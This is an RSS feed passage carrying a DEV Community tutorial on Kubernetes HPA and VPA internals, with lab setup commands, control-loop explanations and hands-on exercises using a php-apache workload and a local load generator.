<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Piyush Jajoo</title>
    <description>The latest articles on DEV Community by Piyush Jajoo (@piyushjajoo).</description>
    <link>https://dev.to/piyushjajoo</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1120882%2Fdb4963b5-a4f3-476e-8d3a-18fee8b04327.png</url>
      <title>DEV Community: Piyush Jajoo</title>
      <link>https://dev.to/piyushjajoo</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/piyushjajoo"/>
    <language>en</language>
    <item>
      <title>Kubernetes Autoscaling Internals: HPA and VPA Under the Hood</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Fri, 03 Apr 2026 01:30:10 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/kubernetes-autoscaling-internals-hpa-and-vpa-under-the-hood-4e0g</link>
      <guid>https://dev.to/piyushjajoo/kubernetes-autoscaling-internals-hpa-and-vpa-under-the-hood-4e0g</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This post assumes Kubernetes 1.27+ and the &lt;code&gt;autoscaling/v2&lt;/code&gt; API. It targets senior ICs and platform engineers who operate autoscaling systems in production.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Prerequisites: Setting Up Your Lab Cluster&lt;/li&gt;
&lt;li&gt;Autoscaling Is a Multi-Loop System&lt;/li&gt;
&lt;li&gt;The Problem Space&lt;/li&gt;
&lt;li&gt;
Horizontal Pod Autoscaler (HPA)

&lt;ul&gt;
&lt;li&gt;The Control Loop&lt;/li&gt;
&lt;li&gt;HPA as a Delayed, Saturating P-Controller&lt;/li&gt;
&lt;li&gt;The End-to-End Reaction Time&lt;/li&gt;
&lt;li&gt;The Scaling Algorithm&lt;/li&gt;
&lt;li&gt;Multi-Metric Behavior&lt;/li&gt;
&lt;li&gt;CPU vs. External Metrics: An Explicit Tradeoff&lt;/li&gt;
&lt;li&gt;HPA v2 Scaling Policies&lt;/li&gt;
&lt;li&gt;The CPU Request Coupling Problem&lt;/li&gt;
&lt;li&gt;Metrics Pipeline&lt;/li&gt;
&lt;li&gt;Scale-to-Zero&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Vertical Pod Autoscaler (VPA)

&lt;ul&gt;
&lt;li&gt;Architecture: Three Separate Components&lt;/li&gt;
&lt;li&gt;The Recommender: Statistical Core&lt;/li&gt;
&lt;li&gt;The Updater: The Disruptive Actor&lt;/li&gt;
&lt;li&gt;The Admission Controller: The Mutation Point&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;HPA vs VPA: When to Use Which&lt;/li&gt;

&lt;li&gt;Cluster Autoscaler Interaction&lt;/li&gt;

&lt;li&gt;Operational Gotchas&lt;/li&gt;

&lt;li&gt;Autoscaling Failure Taxonomy&lt;/li&gt;

&lt;li&gt;Production Incident Pattern: The Black Friday Failure Mode&lt;/li&gt;

&lt;li&gt;Choosing an Autoscaling Strategy&lt;/li&gt;

&lt;li&gt;Production Design Pattern: A Battle-Tested Reference Architecture&lt;/li&gt;

&lt;li&gt;Cost Dynamics of Autoscaling&lt;/li&gt;

&lt;li&gt;What Experienced Engineers Actually Do&lt;/li&gt;

&lt;li&gt;

Common Misconfigurations

&lt;ul&gt;
&lt;li&gt;HPA Anti-Patterns&lt;/li&gt;
&lt;li&gt;VPA Anti-Patterns&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Observability: Metrics That Matter&lt;/li&gt;

&lt;li&gt;Summary&lt;/li&gt;

&lt;/ul&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Prerequisites: Setting Up Your Lab Cluster
&lt;/h2&gt;

&lt;p&gt;Before diving in, spin up a local &lt;code&gt;kind&lt;/code&gt; cluster with metrics-server pre-configured. All exercises in this guide assume this setup.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install kind if you haven't already&lt;/span&gt;
brew &lt;span class="nb"&gt;install &lt;/span&gt;kind          &lt;span class="c"&gt;# macOS&lt;/span&gt;
&lt;span class="c"&gt;# or: curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.22.0/kind-linux-amd64 &amp;amp;&amp;amp; chmod +x kind &amp;amp;&amp;amp; mv kind /usr/local/bin/&lt;/span&gt;

&lt;span class="c"&gt;# Create a 3-node cluster (1 control-plane + 2 workers)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kind create cluster --name autoscaling-lab --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Install metrics-server (kind doesn't ship it)&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml

&lt;span class="c"&gt;# Patch metrics-server to work without TLS verification (required in kind)&lt;/span&gt;
kubectl patch deployment metrics-server &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'[{"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--kubelet-insecure-tls"}]'&lt;/span&gt;

&lt;span class="c"&gt;# Wait for metrics-server to be ready&lt;/span&gt;
kubectl rollout status deployment/metrics-server &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system &lt;span class="nt"&gt;--timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;60s

&lt;span class="c"&gt;# Verify it's working (may take ~30s after rollout)&lt;/span&gt;
kubectl top nodes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Autoscaling Is a Multi-Loop System
&lt;/h2&gt;

&lt;p&gt;Before diving into HPA and VPA internals, it is worth establishing the full system. Kubernetes autoscaling is not one controller — it is four independent control loops operating on different timescales and different variables:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Loop&lt;/th&gt;
&lt;th&gt;What it controls&lt;/th&gt;
&lt;th&gt;Timescale&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;HPA&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Replica count&lt;/td&gt;
&lt;td&gt;Seconds to minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;VPA&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Per-pod resource requests&lt;/td&gt;
&lt;td&gt;Minutes to hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cluster Autoscaler&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Node count&lt;/td&gt;
&lt;td&gt;Minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scheduler&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pod placement&lt;/td&gt;
&lt;td&gt;Milliseconds&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Most production autoscaling incidents do not occur because a single loop misbehaved. They occur because &lt;strong&gt;two loops reacted to the same signal on different timescales&lt;/strong&gt; — HPA scaling out while VPA evicts, CA provisioning for a transient condition, the scheduler unable to place pods while CA is still bootstrapping. Understanding each loop in isolation is necessary but not sufficient. This post focuses on HPA and VPA, but always with awareness of how they interact with the broader system.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem Space
&lt;/h2&gt;

&lt;p&gt;Autoscaling is not "automatic scaling" — it is &lt;strong&gt;approximate control under delayed, noisy signals&lt;/strong&gt;. It is two independent control systems manipulating different variables with incomplete information and non-zero lag. HPA and VPA operate on fundamentally different axes, use different control models, and interact with each other in ways that will cause production incidents if misunderstood. The goal of this post is to build the internal mental model needed to tune and debug them without flying blind.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: Autoscaling is Approximation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Autoscalers operate on metrics that are sampled, aggregated, and delayed. They apply changes that take tens of seconds to minutes to materialize. Perfect elastic scaling is not achievable — only &lt;strong&gt;bounded approximation&lt;/strong&gt; is. The engineering goal is not to eliminate the gap between supply and demand, but to constrain how large that gap can grow and how long it can persist.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Horizontal Pod Autoscaler (HPA)
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Control Loop
&lt;/h3&gt;

&lt;p&gt;HPA is a classic &lt;strong&gt;reconciliation controller&lt;/strong&gt; running in &lt;code&gt;kube-controller-manager&lt;/code&gt;. Every 15 seconds (configurable via &lt;code&gt;--horizontal-pod-autoscaler-sync-period&lt;/code&gt;), it wakes up, samples metrics, computes a desired replica count, and patches the target's &lt;code&gt;spec.replicas&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feq41juhga5ivb77uox8s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feq41juhga5ivb77uox8s.png" alt="image" width="800" height="278"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  HPA as a Delayed, Saturating P-Controller
&lt;/h3&gt;

&lt;p&gt;HPA is not just a proportional controller — it is a &lt;strong&gt;delayed, rate-limited, saturating P-controller operating on a lagging signal&lt;/strong&gt;. It reacts to the instantaneous ratio between observed and desired metric values with no integral or derivative terms. This framing matters because it predicts failure modes precisely:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No integral term&lt;/strong&gt;: Steady-state error persists. If your metric target is set too high, HPA will converge to a replica count that satisfies the ratio on paper but still leaves the service under-provisioned relative to actual demand.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No derivative term&lt;/strong&gt;: HPA cannot anticipate spikes. It has no model of metric velocity or acceleration — only current deviation from target.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High phase lag&lt;/strong&gt;: The 75–135 second reaction chain means HPA is always responding to load conditions that no longer exist at the moment the new pods are ready.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hard saturation&lt;/strong&gt;: &lt;code&gt;minReplicas&lt;/code&gt;/&lt;code&gt;maxReplicas&lt;/code&gt; and scaling policies create non-linear saturation effects. At saturation boundaries, the proportional response is simply clipped.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This combination makes HPA inherently prone to &lt;strong&gt;limit cycles under bursty load&lt;/strong&gt;: it oscillates between under-provisioned and recovering states because it cannot hold position at steady state under noisy input. Stabilization windows exist as bolt-on hysteresis mechanisms rather than intrinsic damping — they reduce oscillation frequency but do not eliminate the underlying phase lag.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: HPA Buys Time, Not Capacity&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HPA does not handle spikes — it reacts after the spike has already started. Your system must survive the first 75–135 seconds &lt;em&gt;without any additional pods&lt;/em&gt;. Conservative CPU targets (50–65%), generous &lt;code&gt;minReplicas&lt;/code&gt;, and pre-warmed capacity buffers are not timidity — they are the engineering response to a controller with 90+ second phase lag.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The End-to-End Reaction Time
&lt;/h3&gt;

&lt;p&gt;A critical mental model that most teams lack is a quantified timing chain. When traffic spikes, the time before new pods are actually serving requests is approximately:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Total Reaction Time ≈
  metric scrape interval    (~15s  for metrics-server)
+ metrics aggregation lag   (~15s)
+ HPA sync period           (~15s)
+ pod startup time          (20–60s depending on image and init)
+ readiness probe delay     (10–30s)
─────────────────────────────────────
Realistic range:             75 – 135 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means that under a sharp traffic spike, your service absorbs load for &lt;strong&gt;over a minute&lt;/strong&gt; before a single additional pod is ready. Setting CPU targets at 80–90% leaves no headroom for that window. Conservative targets (50–65%) exist precisely to buy time for this pipeline to execute.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 1: Observe the HPA Reaction Time Pipeline
&lt;/h3&gt;

&lt;p&gt;Deploy a simple CPU-bound workload and watch the timing chain in action.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy the target workload&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;200m,memory&lt;span class="o"&gt;=&lt;/span&gt;64Mi &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;500m,memory&lt;span class="o"&gt;=&lt;/span&gt;128Mi

kubectl expose deployment php-apache &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80 &lt;span class="nt"&gt;--name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;php-apache
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Create an HPA targeting 50% CPU&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl autoscale deployment php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cpu-percent&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--min&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;--max&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;10

&lt;span class="c"&gt;# Watch the HPA state in one terminal&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Generate load and timestamp the spike&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# In a second terminal: record the exact time and start load&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Load started at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
kubectl run &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;--tty&lt;/span&gt; load-generator &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while sleep 0.01; do wget -q -O- http://php-apache; done"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 4: Measure the delay&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# In a third terminal, poll and timestamp HPA events&lt;/span&gt;
kubectl get events &lt;span class="nt"&gt;--field-selector&lt;/span&gt; involvedObject.name&lt;span class="o"&gt;=&lt;/span&gt;php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sort-by&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'.lastTimestamp'&lt;/span&gt; &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; Note the timestamp when you started the load vs. when the first &lt;code&gt;SuccessfulRescale&lt;/code&gt; event appears. You should see roughly 45–90 seconds of lag. Compare the gap against the timing chain formula above.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Expected signal shape if you were graphing this:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;CPU utilization: sharp spike within 15s of load start&lt;/li&gt;
&lt;li&gt;Replica count: flat for 45–90s, then a step increase&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase lag&lt;/strong&gt; between CPU spike and replica step is the controller's entire reaction pipeline made visible&lt;/li&gt;
&lt;li&gt;After scaling, CPU drops as load spreads across new pods — but there is typically a secondary spike as readiness probes pass and traffic routing catches up&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Stop the load:&lt;/strong&gt; &lt;code&gt;Ctrl+C&lt;/code&gt; in the load-generator terminal. The pod will self-delete (it was &lt;code&gt;--rm&lt;/code&gt;).&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Scaling Algorithm
&lt;/h3&gt;

&lt;p&gt;The core formula:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;desiredReplicas = ceil[currentReplicas × (currentMetricValue / desiredMetricValue)]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Several stabilizing mechanisms layer on top:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Stabilization windows&lt;/strong&gt; prevent oscillation. Because HPA lacks intrinsic damping, stabilization windows act as an external hysteresis mechanism. The controller maintains a rolling window of past recommendations. For scale-down, it selects the &lt;strong&gt;maximum&lt;/strong&gt; recommendation seen during the window (default: 300s), preventing premature scale-in. For scale-up, it selects the &lt;strong&gt;minimum&lt;/strong&gt; recommendation (default: 0s — acts immediately). This asymmetry is intentional: be aggressive about adding capacity, conservative about removing it. CA mirrors this philosophy at the node level — its scale-down is even more conservative, with a default 10-minute idle delay before a node is considered for removal. Both loops are deliberately slow to release capacity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn3i9ej92071aak0d50fo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn3i9ej92071aak0d50fo.png" alt="image" width="800" height="1815"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tolerance&lt;/strong&gt; (default &lt;code&gt;0.1&lt;/code&gt; = 10%) means HPA won't act if &lt;code&gt;currentValue&lt;/code&gt; is within 10% of &lt;code&gt;targetValue&lt;/code&gt;, preventing constant micro-adjustments under noisy metrics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Missing pod handling&lt;/strong&gt;: For pods that have no metrics (not yet &lt;code&gt;Running&lt;/code&gt;, or mid-startup), HPA applies a conservative heuristic. During scale-up, it assumes those pods are consuming 100% of target utilization to avoid under-scaling. During scale-down, it assumes they are at target-level utilization to avoid premature scale-in. They are not assumed to be idle.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 2: Verify the Stabilization Window During Scale-Down
&lt;/h3&gt;

&lt;p&gt;This exercise makes the 300-second scale-down stabilization window visible. You'll drive scale-up, stop the load, and watch HPA refuse to scale down immediately.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup (continuing from Exercise 1, or re-run setup):&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Ensure php-apache HPA exists with default behavior&lt;/span&gt;
kubectl get hpa php-apache
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Generate load until HPA scales out to 3+ replicas:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl run &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;--tty&lt;/span&gt; load-generator &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while sleep 0.01; do wget -q -O- http://php-apache; done"&lt;/span&gt;

&lt;span class="c"&gt;# Wait until replicas &amp;gt;= 3&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Stop load and record the time:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Ctrl+C in load-generator terminal, then:&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Load stopped at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; After load stops, CPU will drop immediately, but HPA will hold replica count for ~5 minutes before scaling down. This is the 300-second &lt;code&gt;scaleDown&lt;/code&gt; stabilization window in action.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Shortcut the wait — override the stabilization window:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl patch hpa php-apache &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  behavior:
    scaleDown:
      stabilizationWindowSeconds: 30
      policies:
      - type: Percent
        value: 100
        periodSeconds: 30'&lt;/span&gt;

&lt;span class="c"&gt;# Now watch scale-down happen much faster&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Key insight:&lt;/strong&gt; The default 300s window exists to prevent flapping. Override it with care — a too-aggressive scale-down policy can cause oscillation under bursty traffic.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Multi-Metric Behavior
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/pkg/controller/podautoscaler/horizontal.go#L313" rel="noopener noreferrer"&gt;computeReplicasForMetrics&lt;/a&gt; in &lt;code&gt;pkg/controller/podautoscaler/&lt;/code&gt; iterates over all configured metrics and takes the &lt;strong&gt;maximum&lt;/strong&gt; desired replica count — metrics are not averaged. Consider a service configured with both CPU and RPS targets:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Current&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Desired Replicas&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CPU&lt;/td&gt;
&lt;td&gt;70%&lt;/td&gt;
&lt;td&gt;50%&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RPS&lt;/td&gt;
&lt;td&gt;800&lt;/td&gt;
&lt;td&gt;400&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;HPA sets replicas = &lt;strong&gt;10&lt;/strong&gt;, driven by RPS. This is mathematically correct but operationally dangerous when one metric is noisy or misconfigured — a spurious spike in any single metric drives the entire replica count up. Monitor individual metric recommendations, not just the resulting replica count.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  CPU vs. External Metrics: An Explicit Tradeoff
&lt;/h3&gt;

&lt;p&gt;The choice of HPA signal is one of the highest-leverage tuning decisions you make. Most teams default to CPU because it requires no additional pipeline — but that convenience has a cost:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;CPU&lt;/th&gt;
&lt;th&gt;RPS / Queue Depth&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Signal freshness&lt;/td&gt;
&lt;td&gt;❌ Lagging (scrape + aggregation + sync = 45s+)&lt;/td&gt;
&lt;td&gt;✅ Near-real-time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Infra independence&lt;/td&gt;
&lt;td&gt;✅ Always available&lt;/td&gt;
&lt;td&gt;❌ Requires metrics pipeline (Prometheus Adapter, KEDA)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VPA coupling risk&lt;/td&gt;
&lt;td&gt;❌ High — VPA changes requests, distorts utilization ratio&lt;/td&gt;
&lt;td&gt;✅ None — orthogonal signal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Throttling blind spot&lt;/td&gt;
&lt;td&gt;❌ Throttled CPUs appear underloaded&lt;/td&gt;
&lt;td&gt;✅ Not affected&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stability&lt;/td&gt;
&lt;td&gt;✅ High — noisy workloads still converge&lt;/td&gt;
&lt;td&gt;⚠️ Lower — noisy metrics drive unnecessary scale events&lt;/td&gt;
